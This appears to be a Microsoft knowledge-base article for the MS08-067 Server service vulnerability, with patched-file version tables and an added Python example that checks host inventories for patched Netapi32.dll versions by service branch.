ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067

The update described in this article resolves a vulnerability in the Server service that could allow remote code execution if an affected system received a specially crafted RPC request.

Support for Windows Vista Service Pack 1 (SP1) ends on July 12, 2011. To continue receiving security updates for Windows, install Service Pack 2 (SP2) for Windows Vista. For more information, see the following Microsoft web page: Support is ending for some versions of Windows.

INTRODUCTION

This article contains information about a beta release of a Microsoft product. The information is provided "as is" and is subject to change without notice.

No formal product support is available from Microsoft for this beta product. For information about how to obtain support for a beta release, see the documentation that is included with the beta product, or check the website from which you downloaded the release.

Microsoft has released security bulletin MS08-067. The complete bulletin is available on the following Microsoft websites:

  • Home users:

    http://www.microsoft.com/rus/protect/computer/updates/bulletins/200810.mspx

    Skip the details: download the updates for your home or portable computer from the Microsoft Update website:

    http://www.update.microsoft.com/microsoftupdate/v6/vistadefault.aspx?ln=ru-ru

  • IT professionals:

    http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx (this link may point to content that is partly or entirely in English)

This is a remote code execution vulnerability. An attacker who successfully exploited it could take complete control of an affected system remotely. On computers running Microsoft Windows 2000, Windows XP and Windows Server 2003, an attacker could exploit this vulnerability over the Remote Procedure Call (RPC) service without authentication and run arbitrary code. A failed exploitation attempt may also crash Svchost.exe. This crash affects the Server service. The Server service provides file, print and named-pipe sharing over the network.

The vulnerability exists because the Server service does not correctly handle specially crafted RPC requests.

Help and support for this security update

File information

The English (United States) version of this software update installs files that have the attributes listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time bias. Additionally, the dates and times may change when you perform certain operations on the files.

For all supported editions of Microsoft Windows 2000 Service Pack 4 (SP4)

| File name | File version | File size | Date | Time | Platform |
|---|---|---|---|---|---|
| Netapi32.dll | 5.0.2195.7203 | 310,032 | 18-Oct-2008 | 03:11 | x86 |


File information notes for Windows XP and Windows Server 2003

  • The files that apply to a specific milestone (RTM, SPn) and service branch (QFE, GDR) are noted in the "SP requirement" and "Service branch" columns.

  • GDR service branches contain only those fixes that are widely released to address widespread, critical issues. QFE service branches contain hotfixes in addition to widely released fixes.

  • In addition to the files listed in these tables, this software update also installs an associated security catalog file (KBnumber.cat) that is signed with a Microsoft digital signature.


For all supported 32-bit editions of Windows XP

| File name | File version | File size | Date | Time | Platform | SP requirement | Service branch |
|---|---|---|---|---|---|---|---|
| Netapi32.dll | 5.1.2600.3462 | 332,800 | 15-Oct-2008 | 16:57 | x86 | SP2 | SP2GDR |
| Netapi32.dll | 5.1.2600.3462 | 339,456 | 15-Oct-2008 | 16:53 | x86 | SP2 | SP2QFE |
| Netapi32.dll | 5.1.2600.5694 | 337,408 | 15-Oct-2008 | 16:34 | x86 | SP3 | SP3GDR |
| Netapi32.dll | 5.1.2600.5694 | 339,456 | 15-Oct-2008 | 16:25 | x86 | SP3 | SP3QFE |


For all supported x64-based editions of Windows Server 2003 and Windows XP Professional

| File name | File version | File size | Date | Time | Platform | SP requirement | Service branch |
|---|---|---|---|---|---|---|---|
| Netapi32.dll | 5.2.3790.3229 | 603,648 | 17-Oct-2008 | 11:44 | x64 | SP1 | SP1GDR |
| Wnetapi32.dll | 5.2.3790.3229 | 350,208 | 17-Oct-2008 | 11:44 | x86 | SP1 | SP1GDR\WOW |
| Netapi32.dll | 5.2.3790.3229 | 606,720 | 17-Oct-2008 | 11:44 | x64 | SP1 | SP1QFE |
| Wnetapi32.dll | 5.2.3790.3229 | 352,768 | 17-Oct-2008 | 11:44 | x86 | SP1 | SP1QFE\WOW |
| Netapi32.dll | 5.2.3790.4392 | 603,648 | 17-Oct-2008 | 11:53 | x64 | SP2 | SP2GDR |
| Wnetapi32.dll | 5.2.3790.4392 | 345,088 | 17-Oct-2008 | 11:53 | x86 | SP2 | SP2GDR\WOW |
| Netapi32.dll | 5.2.3790.4392 | 606,720 | 17-Oct-2008 | 11:44 | x64 | SP2 | SP2QFE |
| Wnetapi32.dll | 5.2.3790.4392 | 347,648 | 17-Oct-2008 | 11:44 | x86 | SP2 | SP2QFE\WOW |


For all supported 32-bit editions of Windows Server 2003

| File name | File version | File size | Date | Time | Platform | SP requirement | Service branch |
|---|---|---|---|---|---|---|---|
| Netapi32.dll | 5.2.3790.3229 | 350,208 | 16-Oct-2008 | 20:09 | x86 | SP1 | SP1GDR |
| Netapi32.dll | 5.2.3790.3229 | 352,768 | 16-Oct-2008 | 21:47 | x86 | SP1 | SP1QFE |
| Netapi32.dll | 5.2.3790.4392 | 345,088 | 16-Oct-2008 | 22:18 | x86 | SP2 | SP2GDR |
| Netapi32.dll | 5.2.3790.4392 | 347,648 | 16-Oct-2008 | 23:37 | x86 | SP2 | SP2QFE |


For all supported IA-64-based editions of Windows Server 2003

| File name | File version | File size | Date | Time | Platform | SP requirement | Service branch |
|---|---|---|---|---|---|---|---|
| Netapi32.dll | 5.2.3790.3229 | 905,216 | 17-Oct-2008 | 11:45 | IA-64 | SP1 | SP1GDR |
| Wnetapi32.dll | 5.2.3790.3229 | 350,208 | 17-Oct-2008 | 11:45 | x86 | SP1 | SP1GDR\WOW |
| Netapi32.dll | 5.2.3790.3229 | 910,848 | 17-Oct-2008 | 11:45 | IA-64 | SP1 | SP1QFE |
| Wnetapi32.dll | 5.2.3790.3229 | 352,768 | 17-Oct-2008 | 11:45 | x86 | SP1 | SP1QFE\WOW |
| Netapi32.dll | 5.2.3790.4392 | 905,216 | 17-Oct-2008 | 11:50 | IA-64 | SP2 | SP2GDR |
| Wnetapi32.dll | 5.2.3790.4392 | 345,088 | 17-Oct-2008 | 11:50 | x86 | SP2 | SP2GDR\WOW |
| Netapi32.dll | 5.2.3790.4392 | 910,848 | 17-Oct-2008 | 11:45 | IA-64 | SP2 | SP2QFE |
| Wnetapi32.dll | 5.2.3790.4392 | 347,648 | 17-Oct-2008 | 11:45 | x86 | SP2 | SP2QFE\WOW |


File information notes for Windows Vista, Microsoft Hyper-V Server 2008 and Windows Server 2008

  • The files that apply to a specific product, milestone (RTM, SPn) and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table.

    | Version | Product | Milestone | Service branch |
    |---|---|---|---|
    | 6.0.6000.16xxx | Windows Vista | RTM | GDR |
    | 6.0.6000.20xxx | Windows Vista | RTM | LDR |
    | 6.0.6001.18xxx | Windows Vista SP1 and Windows Server 2008 SP1 | SP1 | GDR |
    | 6.0.6001.22xxx | Windows Vista SP1 and Windows Server 2008 SP1 | SP1 | LDR |

  • Service Pack 1 is integrated into the original release of Windows Server 2008. Therefore, RTM milestone files apply only to Windows Vista. RTM milestone files have a 6.0.0000.xxxxxx version number.

  • GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes.

  • The MANIFEST files (.manifest) and MUM files (.mum) that are installed for each environment are listed separately. MUM and MANIFEST files, and the associated security catalog (.cat) files, are critical to maintaining the state of the updated component. The security catalog files (attributes not listed) are signed with a Microsoft digital signature.
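The branch numbering in that table is what makes a correct "is this host patched?" check non-trivial: a file from the LDR branch must be compared with the LDR minimum, not with the numerically lower GDR one. The following Python is an added example, not code from the Microsoft article; it applies the minimum Netapi32.dll versions from this article's file tables to a constructed host inventory, and the XP / Server 2003 service-pack revision boundaries it uses are its own assumption.

```python
"""Branch-aware check of Netapi32.dll file versions against the minimum
versions in this article's file tables (MS08-067 / KB958644).

Added example for this page, not code from the Microsoft article.  The host
inventory below is constructed, and the XP / Server 2003 service-pack
boundaries in BRANCHES are this example's assumption, not the article's.
"""

Version = tuple[int, int, int, int]

# (major, minor, build) identifies the Windows release; within it the fourth
# component (the revision) selects the service pack or service branch.
# Entry: (label, lowest revision in range, highest revision, minimum patched revision).
# The Vista / Server 2008 ranges (16xxx GDR, 20xxx LDR, 18xxx SP1 GDR, 22xxx
# SP1 LDR) come from the article's branch table.  For XP and Server 2003 the
# GDR and QFE files share one version number, so the only split is by service
# pack; the boundaries (XP SP3 from 5.1.2600.5512, Server 2003 SP2 from
# 5.2.3790.3959) are an assumption of this example.
BRANCHES: dict[tuple[int, int, int], list[tuple[str, int, int, int]]] = {
    (5, 0, 2195): [("Windows 2000 SP4", 0, 99999, 7203)],
    (5, 1, 2600): [("Windows XP SP2", 0, 5511, 3462),
                   ("Windows XP SP3", 5512, 99999, 5694)],
    (5, 2, 3790): [("Windows Server 2003 / XP x64 SP1", 0, 3958, 3229),
                   ("Windows Server 2003 / XP x64 SP2", 3959, 99999, 4392)],
    (6, 0, 6000): [("Windows Vista RTM GDR", 16000, 16999, 16764),
                   ("Windows Vista RTM LDR", 20000, 20999, 20937)],
    (6, 0, 6001): [("Vista SP1 / Server 2008 GDR", 18000, 18999, 18157),
                   ("Vista SP1 / Server 2008 LDR", 22000, 22999, 22288)],
}


def parse_version(text: str) -> Version:
    """'6.0.6001.18157' -> (6, 0, 6001, 18157); rejects anything else."""
    parts = text.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a four-part file version: {text!r}")
    major, minor, build, rev = (int(p) for p in parts)
    return (major, minor, build, rev)


def assess(version_text: str) -> tuple[str, str]:
    """Classify one Netapi32.dll version as 'patched', 'vulnerable' or 'unknown'.

    The revision is compared only with the minimum of its own branch, so an
    LDR file is never judged against the (lower) GDR minimum or vice versa.
    """
    major, minor, build, rev = parse_version(version_text)
    for label, lo, hi, minimum in BRANCHES.get((major, minor, build), []):
        if lo <= rev <= hi:
            return ("patched" if rev >= minimum else "vulnerable", label)
    # Builds the tables do not cover (for Windows 7 the fix is in Netutils.dll).
    return ("unknown", "not covered by this article's Netapi32.dll tables")


def naive_is_patched(version_text: str) -> bool:
    """The shortcut to avoid: 'at least the lowest version listed for this build'.

    It passes an LDR/QFE file that is newer than the GDR fix but older than
    the LDR fix, because it ignores the branch encoded in the revision.
    """
    version = parse_version(version_text)
    listed = [(*key, branch[3]) for key, branches in BRANCHES.items()
              for branch in branches if key == version[:3]]
    return bool(listed) and version >= min(listed)


# Constructed inventory: hostname -> Netapi32.dll version as a file scan reports it.
INVENTORY = {
    "dc01": "5.2.3790.4392",    # Server 2003 SP2, exactly the patched version
    "ws17": "5.1.2600.3462",    # XP SP2 at the minimum
    "ws22": "5.1.2600.5512",    # XP SP3 original file, below 5694
    "lt03": "6.0.6000.20500",   # Vista RTM LDR branch, below 20937
    "lt04": "6.0.6000.16830",   # Vista RTM GDR branch, above 16764
    "srv08": "6.0.6001.18157",  # Server 2008 SP1 GDR at the minimum
    "kiosk": "5.0.2195.7100",   # Windows 2000 SP4, below 7203
    "w7rtm": "6.1.7600.16385",  # Windows 7: these Netapi32.dll tables do not apply
}


def scan(inventory: dict[str, str]) -> dict[str, list[str]]:
    """Group hosts by status, visiting them in name order for stable output."""
    report: dict[str, list[str]] = {"patched": [], "vulnerable": [], "unknown": []}
    for host, version in sorted(inventory.items()):
        status, _branch = assess(version)
        report[status].append(host)
    return report


if __name__ == "__main__":
    for host, version in sorted(INVENTORY.items()):
        status, branch = assess(version)
        note = ""
        if status == "vulnerable" and naive_is_patched(version):
            note = "  (a plain version comparison would have passed this)"
        print(f"{host:6} {version:15} {status:10} {branch}{note}")
```

Host lt03 is the case the branch table warns about: 6.0.6000.20500 is numerically above the GDR minimum 6.0.6000.16764, yet it is an LDR-branch file below 6.0.6000.20937 and therefore still unpatched.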


For all supported 32-bit editions of Windows Server 2008 and Windows Vista

| File name | File version | File size | Date | Time | Platform |
|---|---|---|---|---|---|
| Netapi32.dll | 6.0.6000.16764 | 425,472 | 16-Oct-2008 | 04:40 | x86 |
| Netapi32.dll | 6.0.6000.20937 | 425,984 | 16-Oct-2008 | 04:22 | x86 |
| Netapi32.dll | 6.0.6001.18157 | 466,944 | 16-Oct-2008 | 04:47 | x86 |
| Netapi32.dll | 6.0.6001.22288 | 466,944 | 16-Oct-2008 | 04:38 | x86 |


For all supported x64-based editions of Windows Server 2008, Hyper-V Server 2008 and Windows Vista

| File name | File version | File size | Date | Time | Platform |
|---|---|---|---|---|---|
| Netapi32.dll | 6.0.6000.16764 | 607,232 | 16-Oct-2008 | 04:43 | x64 |
| Netapi32.dll | 6.0.6000.20937 | 606,720 | 16-Oct-2008 | 04:28 | x64 |
| Netapi32.dll | 6.0.6001.18157 | 648,704 | 16-Oct-2008 | 05:49 | x64 |
| Netapi32.dll | 6.0.6001.22288 | 648,704 | 16-Oct-2008 | 05:02 | x64 |
| Netapi32.dll | 6.0.6000.16764 | 425,472 | 16-Oct-2008 | 04:40 | x86 |
| Netapi32.dll | 6.0.6000.20937 | 425,984 | 16-Oct-2008 | 04:22 | x86 |
| Netapi32.dll | 6.0.6001.18157 | 466,944 | 16-Oct-2008 | 04:47 | x86 |
| Netapi32.dll | 6.0.6001.22288 | 466,944 | 16-Oct-2008 | 04:38 | x86 |


For all supported IA-64-based editions of Windows Server 2008

| File name | File version | File size | Date | Time | Platform |
|---|---|---|---|---|---|
| Netapi32.dll | 6.0.6001.18157 | 1,080,832 | 16-Oct-2008 | 06:21 | IA-64 |
| Netapi32.dll | 6.0.6001.22288 | 1,080,832 | 16-Oct-2008 | 04:59 | IA-64 |
| Netapi32.dll | 6.0.6001.18157 | 466,944 | 16-Oct-2008 | 04:47 | x86 |
| Netapi32.dll | 6.0.6001.22288 | 466,944 | 16-Oct-2008 | 04:38 | x86 |

File information notes for Windows 7 (pre-beta)

The MANIFEST files (.manifest) and MUM files (.mum) that are installed for each environment are listed separately. MUM and MANIFEST files, and the associated security catalog (.cat) files, are critical to maintaining the state of the updated component. The security catalog files (attributes not listed) are signed with a Microsoft digital signature.

For all supported 32-bit editions of Windows 7 (pre-beta)

| File name | File version | File size | Date | Time | Platform |
|---|---|---|---|---|---|
| Netutils.dll | 6.1.6801.4107 | 22,528 | 20-Oct-2008 | 23:19 | x86 |


For all supported 64-bit editions of Windows 7 (pre-beta)

| File name | File version | File size | Date | Time | Platform |
|---|---|---|---|---|---|
| Netutils.dll | 6.1.6801.4107 | 29,184 | 20-Oct-2008 | 23:47 | x64 |
| Netutils.dll | 6.1.6801.4107 | 22,528 | 20-Oct-2008 | 23:19 | x86 |


For all supported IA-64-based editions of Windows 7 (pre-beta)

| File name | File version | File size | Date | Time | Platform |
|---|---|---|---|---|---|
| Netutils.dll | 6.1.6801.4107 | 59,904 | 20-Oct-2008 | 23:08 | IA-64 |
| Netutils.dll | 6.1.6801.4107 | 22,528 | 20-Oct-2008 | 23:19 | x86 |

Additional file information for Windows Server 2008, Windows Vista and Windows 7 (pre-beta)

Additional files for all supported 32-bit editions of Windows Server 2008 and Windows Vista

| File name | File version | File size | Date (UTC) | Time (UTC) | Platform |
|---|---|---|---|---|---|
| Package_1_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,743 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_1_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 2,445 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_2_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,906 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_2_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 2,612 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_3_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,748 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_3_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 2,450 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_4_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,748 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_4_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 2,452 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_5_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,748 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_5_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 2,452 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_6_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,744 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_6_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 2,447 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_client_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,416 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_client_0~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,435 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_client_1_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,357 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_client_1~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,376 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_client_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,691 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_client~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,722 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,411 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc_0~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,431 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,413 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,432 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,415 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server_0~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,434 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,421 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,440 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpesrv_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,412 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpesrv_0~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,431 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpesrv_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,420 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpesrv~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,439 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpe_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,410 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpe_0~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,429 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpe_bf~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,414 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpe~31bf3856ad364e35~x86~~6.0.1.0.mum | Not Applicable | 1,433 | 16-Oct-2008 | 15:02 | Not Applicable |
| Update-bf.mum | Not Applicable | 3,493 | 16-Oct-2008 | 15:02 | Not Applicable |
| X86_36258762845e107951bd9aa6bb6e2cf2_31bf3856ad364e35_6.0.6000.20937_none_1b3e8fbe3df577d5.manifest | Not Applicable | 696 | 16-Oct-2008 | 15:02 | Not Applicable |
| X86_839cbb983f595ac76fde121c813c640b_31bf3856ad364e35_6.0.6000.16764_none_c31a32b5eaec82f7.manifest | Not Applicable | 696 | 16-Oct-2008 | 15:02 | Not Applicable |
| X86_8beec6c9c4e53ad3ad4e2eefee83c7bb_31bf3856ad364e35_6.0.6001.22288_none_24746e8695e50ab0.manifest | Not Applicable | 696 | 16-Oct-2008 | 15:02 | Not Applicable |
| X86_cf5fc08aa887a883eefd054adf032c14_31bf3856ad364e35_6.0.6001.18157_none_f5617edb87321701.manifest | Not Applicable | 696 | 16-Oct-2008 | 15:02 | Not Applicable |
| X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.16764_none_8b10fff30496576a.manifest | Not Applicable | 12,029 | 16-Oct-2008 | 05:29 | Not Applicable |
| X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.20937_none_8bbe0f461d98ec8d.manifest | Not Applicable | 12,029 | 16-Oct-2008 | 04:57 | Not Applicable |
| X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d050f6301b2186f.manifest | Not Applicable | 12,029 | 16-Oct-2008 | 05:24 | Not Applicable |
| X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d6f3cb41ae72563.manifest | Not Applicable | 12,029 | 16-Oct-2008 | 05:09 | Not Applicable |


Additional files for all supported x64-based editions of Windows Server 2008, Hyper-V Server 2008 and Windows Vista

| File name | File version | File size | Date (UTC) | Time (UTC) | Platform |
|---|---|---|---|---|---|
| Amd64_016ff16d0fb7adfd32cc8cac619f7020_31bf3856ad364e35_6.0.6001.22288_none_63879e5572c63a8d.manifest | Not Applicable | 1,040 | 16-Oct-2008 | 15:02 | Not Applicable |
| Amd64_17b51416d1f0879bd01802235d17e183_31bf3856ad364e35_6.0.6001.18157_none_059d2147a43b46c0.manifest | Not Applicable | 1,040 | 16-Oct-2008 | 15:02 | Not Applicable |
| Amd64_4a708e10febe190d564ab30203394f1c_31bf3856ad364e35_6.0.6000.16764_none_7838dfe143478799.manifest | Not Applicable | 700 | 16-Oct-2008 | 15:02 | Not Applicable |
| Amd64_67941fc4deac88f98600b6aa3d634fa5_31bf3856ad364e35_6.0.6001.18157_none_7700084c05e335ee.manifest | Not Applicable | 700 | 16-Oct-2008 | 15:02 | Not Applicable |
| Amd64_73aa7275aac93043dad7f68b22dc689e_31bf3856ad364e35_6.0.6000.20937_none_8d173e2dc1c0db98.manifest | Not Applicable | 700 | 16-Oct-2008 | 15:02 | Not Applicable |
| Amd64_854c9ca1f90fdf0fef990f5d99c75b11_31bf3856ad364e35_6.0.6001.22288_none_48ff81aaf19bff94.manifest | Not Applicable | 700 | 16-Oct-2008 | 15:02 | Not Applicable |
| Amd64_c889ea7b0835e36fc67c4ccc4ec07ed3_31bf3856ad364e35_6.0.6000.16764_none_c5bae36e7a056bed.manifest | Not Applicable | 1,040 | 16-Oct-2008 | 15:02 | Not Applicable |
| Amd64_f9502c7e5f482bc6c92ce8f63becff94_31bf3856ad364e35_6.0.6000.20937_none_c14b7e8f3e6dce2d.manifest | Not Applicable | 1,040 | 16-Oct-2008 | 15:02 | Not Applicable |
| Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.16764_none_e72f9b76bcf3c8a0.manifest | Not Applicable | 12,067 | 16-Oct-2008 | 05:21 | Not Applicable |
| Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.20937_none_e7dcaac9d5f65dc3.manifest | Not Applicable | 12,067 | 16-Oct-2008 | 05:01 | Not Applicable |
| Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_e923aae6ba0f89a5.manifest | Not Applicable | 12,067 | 16-Oct-2008 | 06:39 | Not Applicable |
| Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_e98dd837d3449699.manifest | Not Applicable | 12,067 | 16-Oct-2008 | 05:38 | Not Applicable |
| Package_1_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,753 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_1_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 2,459 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_2_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 2,126 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_2_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 3,056 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_3_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,966 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_3_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 2,892 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_4_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,966 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_4_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 2,894 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_5_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,966 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_5_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 2,894 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_6_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,754 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_6_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 2,461 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_client_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,424 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_client_0~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,443 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_client_1_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,365 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_client_1~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,384 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_client_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,701 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_client~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,732 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,419 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc_0~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,439 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,421 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,440 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,423 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server_0~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,442 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,429 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,448 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpesrv_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,420 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpesrv_0~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,439 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpesrv_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,428 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpesrv~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,447 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpe_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,418 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpe_0~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,437 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpe_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,422 | 16-Oct-2008 | 15:02 | Not Applicable |
